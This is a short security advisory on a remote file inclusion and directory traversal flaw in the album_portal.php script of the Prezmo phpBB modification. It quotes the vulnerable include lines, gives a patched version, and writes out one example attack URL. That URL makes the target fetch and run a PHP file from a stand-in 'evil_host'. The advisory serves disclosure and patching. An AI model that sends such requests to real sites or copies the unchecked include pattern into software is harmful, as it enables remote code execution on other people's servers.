|
Brought to you by:
Suppliers of:
|
|
|
| |
The Prezmo phpBB modification is "based on phpBB 2.0.X script, the modification contains about 200 add-ons, with the ability to switch off any of them through an administrative panel".
A directory traversal vulnerability and insecure file inclusion vulnerability in the product allow an attacker to execute a different script (our script) that contains arbitrary code. |
| |
Credit:
The information has been provided by Dariusz 'Officerrr' Kolasinski.
|
| |
Vulnerable Systems:
* phpBB version 1.8
The vulnerable snippet of code is in the album_portal.php script:
------------------ CUT HERE ---------------------------------
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
------------------ CUT HERE ---------------------------------
No sanity checking is being performed therefore the vulnerability can manifest itself.
Workaround
To generate a patch change the following lines in the album_portal.php file:
[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]
To
[code]
define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
[/code]
Example:
An example of an HTTP request that can exploit this vulnerability is:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]
Note: evil_file.php must exist on the evil_host.
|
|
|
|
|
